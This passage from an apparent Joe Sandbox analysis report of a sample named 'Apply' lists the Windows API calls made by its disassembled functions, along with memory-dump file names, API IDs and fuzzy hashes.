                                                      • Part of subcall function 0086956F: BeginPath.GDI32(00000000), ref: 0086958D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                    • String ID:
                                                    • API String ID: 3050599898-0
                                                    • Opcode ID: fc5cc691c679a359a3d7e6eefabb5aab13d2673fb063aee23380efd5d4c5e0b9
                                                    • Instruction ID: a165d0951775d7c9a5ef6876929e569b7bfd1423a2835cf67dd95ff0e716aec9
                                                    • Opcode Fuzzy Hash: fc5cc691c679a359a3d7e6eefabb5aab13d2673fb063aee23380efd5d4c5e0b9
                                                    • Instruction Fuzzy Hash: B641A230109305AFD721DF24CC88F767BA8FB56724F140169F999CB2E2D7309845EB62
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 008C0EDD
                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 008C0F18
                                                    • EnterCriticalSection.KERNEL32(?), ref: 008C0F34
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 008C0FAD
                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 008C0FC4
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 008C0FF2
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                    • String ID:
                                                    • API String ID: 3368777196-0
                                                    • Opcode ID: 73b5b48e2de1c79a4e010c400f737eb99d66f519ae5d9e9ebea5be901be1fc89
                                                    • Instruction ID: e51e91b2513dee0a9dad710ed01df817339d1cea303596cc84a87c6f6d69dee5
                                                    • Opcode Fuzzy Hash: 73b5b48e2de1c79a4e010c400f737eb99d66f519ae5d9e9ebea5be901be1fc89
                                                    • Instruction Fuzzy Hash: BF414A71900205EBDF14EF58DC85AAAB778FF04310F1480A9E904DE29ADB70EE95DFA1
                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,008AF95A,00000000,?,?,00000000,?,00892A40,00000004,00000000,00000000), ref: 008E8938
                                                    • EnableWindow.USER32(?,00000000), ref: 008E895E
                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 008E89BD
                                                    • ShowWindow.USER32(?,00000004), ref: 008E89D1
                                                    • EnableWindow.USER32(?,00000001), ref: 008E89F7
                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 008E8A1B
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: e9def10bdb6c5e3e0aa8692e34590587312437987c9b342eb905dbc34a5a599d
                                                    • Instruction ID: 354437f7baea31ed3f77c144018298fb461d169cbf4f1fcab7adcad772efba8a
                                                    • Opcode Fuzzy Hash: e9def10bdb6c5e3e0aa8692e34590587312437987c9b342eb905dbc34a5a599d
                                                    • Instruction Fuzzy Hash: 8A418134A05284EFDB26DF15C989BB87FA0FB07314F1841A9E55C9B273CB316846DB42
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 008D2A6F
                                                      • Part of subcall function 008CEC5D: GetWindowRect.USER32(?,?), ref: 008CEC75
                                                    • GetDesktopWindow.USER32 ref: 008D2A99
                                                    • GetWindowRect.USER32(00000000), ref: 008D2AA0
                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 008D2ADC
                                                    • GetCursorPos.USER32(?), ref: 008D2B08
                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008D2B66
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                    • String ID:
                                                    • API String ID: 2387181109-0
                                                    • Opcode ID: e2c88f83f0fe3da17661f70fbfe0bbc36c15113a380da3bb6c71c1e6ea311e1f
                                                    • Instruction ID: c96e1ac781c9aec3960969bf2e59e2c08348add0c0ee49346b162902b1842b6a
                                                    • Opcode Fuzzy Hash: e2c88f83f0fe3da17661f70fbfe0bbc36c15113a380da3bb6c71c1e6ea311e1f
                                                    • Instruction Fuzzy Hash: 0E31C372505366AFC720DF18C849F9BB7A9FF94314F000A1AF899D7291DB74E908CB92
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 008B538E
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008B53AB
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008B53E3
                                                    • _wcslen.LIBCMT ref: 008B5401
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008B5409
                                                    • _wcsstr.LIBVCRUNTIME ref: 008B5413
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                    • String ID:
                                                    • API String ID: 72514467-0
                                                    • Opcode ID: 43b9d47d182fe293aa4178c27ff6d64936df226e8877539ea2555067a4f56d6f
                                                    • Instruction ID: 8cc624be42049c5001272bc33c86cd6b40abf8ee8d373c3f991217ab17fb78c2
                                                    • Opcode Fuzzy Hash: 43b9d47d182fe293aa4178c27ff6d64936df226e8877539ea2555067a4f56d6f
                                                    • Instruction Fuzzy Hash: 1F210472604644BBEB165B699C49FBF7BD8FF49750F108039F809CA2A1EAB1CC4186A0
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 008E83D1
                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 008E83F6
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008E840E
                                                    • GetSystemMetrics.USER32(00000004), ref: 008E8437
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,008CBF1C,00000000), ref: 008E8457
                                                      • Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2
                                                    • GetSystemMetrics.USER32(00000004), ref: 008E8442
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: 1f98975ee249a7b73f5ee5d2827f7438aa2bdafc32a14b7f84f9505e85f1aaba
                                                    • Instruction ID: 08ff566491bac4e94e468f7c207544b97287e9714ccbf5e3184c8170509bf866
                                                    • Opcode Fuzzy Hash: 1f98975ee249a7b73f5ee5d2827f7438aa2bdafc32a14b7f84f9505e85f1aaba
                                                    • Instruction Fuzzy Hash: F221A171610396EFCB249F79CC48A6E37A5FB46329F258629F92AC61E0DE308854DB14
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,008736C9,00873335), ref: 008736E0
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008736EE
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00873707
                                                    • SetLastError.KERNEL32(00000000,?,008736C9,00873335), ref: 00873759
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: e86f4959143cf545ca0006deabd6ab263ade84596de958a8ad79c64bc3b89d8d
                                                    • Instruction ID: 177b8928b33a7475bb876329a6e994fa503c20ec6b3e456fb2889d3bacd5a2f3
                                                    • Opcode Fuzzy Hash: e86f4959143cf545ca0006deabd6ab263ade84596de958a8ad79c64bc3b89d8d
                                                    • Instruction Fuzzy Hash: FB01F9B731E7216EA61866786CC55561A95F7163B5720C239F128C51E4FF11CD02B143
                                                    APIs
                                                    • GetLastError.KERNEL32(?,00000000,00874D33,00000000,?,?,008768C2,?,?,00000000), ref: 008830C8
                                                    • _free.LIBCMT ref: 008830FB
                                                    • _free.LIBCMT ref: 00883123
                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00883130
                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 0088313C
                                                    • _abort.LIBCMT ref: 00883142
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free$_abort
                                                    • String ID:
                                                    • API String ID: 3160817290-0
                                                    • Opcode ID: b3021f652fab0ec1c400be1def1ffc00d58280812c6678c83135673fcd497f2e
                                                    • Instruction ID: 69cd6bec812854405b9f068de21ff7cd979e0d41c02b21cac268cce141c38564
                                                    • Opcode Fuzzy Hash: b3021f652fab0ec1c400be1def1ffc00d58280812c6678c83135673fcd497f2e
                                                    • Instruction Fuzzy Hash: 75F0223A609A1167C232B73CAC0EA9B3629FFD0F74F204114F829D6291FF258A019363
                                                    APIs
                                                      • Part of subcall function 0086986F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008698C9
                                                      • Part of subcall function 0086986F: SelectObject.GDI32(?,00000000), ref: 008698D8
                                                      • Part of subcall function 0086986F: BeginPath.GDI32(?), ref: 008698EF
                                                      • Part of subcall function 0086986F: SelectObject.GDI32(?,00000000), ref: 00869918
                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 008E913A
                                                    • LineTo.GDI32(?,00000003,00000000), ref: 008E914E
                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 008E915C
                                                    • LineTo.GDI32(?,00000000,00000003), ref: 008E916C
                                                    • EndPath.GDI32(?), ref: 008E917C
                                                    • StrokePath.GDI32(?), ref: 008E918C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                    • String ID:
                                                    • API String ID: 43455801-0
                                                    • Opcode ID: d61868818b8fc7447b6a0a7449a39df919f9ceafa3fe8626077c68cc0cf91808
                                                    • Instruction ID: 164016364875b340234ea23a6d52d5927bd29216c63805b24aea11141b00efd9
                                                    • Opcode Fuzzy Hash: d61868818b8fc7447b6a0a7449a39df919f9ceafa3fe8626077c68cc0cf91808
                                                    • Instruction Fuzzy Hash: D1111B7600024DBFDF129F90DC88E9A7F6DFB08350F048021FE198A1A1C772AD56EBA0
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 008B5911
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 008B5922
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008B5929
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 008B5931
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 008B5948
                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 008B595A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: ef7c638155f37430fd9ddced53c4eefb3a0e67e849402913cb2295747ded993e
                                                    • Instruction ID: a2a26e249e44e3dd438fa464cb0e30eecce83cd143498baab644fa829f97e13e
                                                    • Opcode Fuzzy Hash: ef7c638155f37430fd9ddced53c4eefb3a0e67e849402913cb2295747ded993e
                                                    • Instruction Fuzzy Hash: FC018475A00708BBEB109FE59C89F5EBF78FB54351F044065FA08EB291D6709804CF90
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00852ABE
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00852AC6
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00852AD1
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00852ADC
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00852AE4
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00852AEC
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: fec2f86613c3a5bb46cedf21f2af46d068919558a00c0697a44ed22d0d2034d9
                                                    • Instruction ID: 31237d2f38fd7e07dd31ae929717988305935dc6189412a594fc8a03982a7593
                                                    • Opcode Fuzzy Hash: fec2f86613c3a5bb46cedf21f2af46d068919558a00c0697a44ed22d0d2034d9
                                                    • Instruction Fuzzy Hash: AB016CB09017597DE3008F5A8C85B52FFA8FF19354F00411B915C4B941C7F5A864CBE5
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008BF171
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008BF187
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 008BF196
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008BF1A5
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008BF1AF
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008BF1B6
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: ef774847959467db9e0fce2ef0228133dc3ca64872e0f5b0b198633dce62f0e1
                                                    • Instruction ID: 7a117afa9aae4b8ee616960f0b07ac5ce173e5ec3241f544b6dd33b27889fe63
                                                    • Opcode Fuzzy Hash: ef774847959467db9e0fce2ef0228133dc3ca64872e0f5b0b198633dce62f0e1
                                                    • Instruction Fuzzy Hash: 3CF03032241298BFE72157529C4EEEF7B7CFFC6B11F000059F611D9191D7A06A05C6B5
                                                    APIs
                                                      • Part of subcall function 00853914: _wcslen.LIBCMT ref: 00853919
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008BCCD3
                                                    • _wcslen.LIBCMT ref: 008BCD1A
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008BCD81
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008BCDAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                    • String ID: 0
                                                    • API String ID: 1227352736-4108050209
                                                    • Opcode ID: a42c2d09e69302367701bbe6db99d4a667abb46a3c43c71e607a5a501896520c
                                                    • Instruction ID: fd3ccd899309556874614a9afec8a1edc8b8e2defbbd3e7e6369e02f25b5ed38
                                                    • Opcode Fuzzy Hash: a42c2d09e69302367701bbe6db99d4a667abb46a3c43c71e607a5a501896520c
                                                    • Instruction Fuzzy Hash: 6251DF756043019BD7259F28C885BABBFE8FB95354F080A3DF995D72A0DB70D904CB52
                                                    APIs
                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 008DB62A
                                                      • Part of subcall function 00853914: _wcslen.LIBCMT ref: 00853919
                                                    • GetProcessId.KERNEL32(00000000), ref: 008DB6BF
                                                    • CloseHandle.KERNEL32(00000000), ref: 008DB6EE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                    • String ID: <$@
                                                    • API String ID: 146682121-1426351568
                                                    • Opcode ID: 6422343fc520dfc9e4c2737db63a5dc29b007c5a6c46ba16247deacb7ca3a0ee
                                                    • Instruction ID: f347878f8a5602801aae006d0d6e7e393ce43d02737c887d2733208e5b88dd6b
                                                    • Opcode Fuzzy Hash: 6422343fc520dfc9e4c2737db63a5dc29b007c5a6c46ba16247deacb7ca3a0ee
                                                    • Instruction Fuzzy Hash: F8714271A00219DFCB14EF58D485A9EBBF1FF08314F05859AE856AB3A2CB70ED45CB91
                                                    APIs
                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 008B78FF
                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008B7935
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008B7946
                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008B79C8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: DllGetClassObject
                                                    • API String ID: 753597075-1075368562
                                                    • Opcode ID: 529cbeb1e0029bef46bc5a83073c75cd9614eebf3c5da2f786a511677646d37f
                                                    • Instruction ID: f032190e8d7b358ac0e426957b928028534ebc25ebf08de887fb776ba033911a
                                                    • Opcode Fuzzy Hash: 529cbeb1e0029bef46bc5a83073c75cd9614eebf3c5da2f786a511677646d37f
                                                    • Instruction Fuzzy Hash: F6412971604319AFDF15CF64C884A9ABBB9FF84314F1480AAA905DF346D7B5DA44CBA0
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E45F3
                                                    • IsMenu.USER32(?), ref: 008E4608
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008E4650
                                                    • DrawMenuBar.USER32 ref: 008E4663
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert
                                                    • String ID: 0
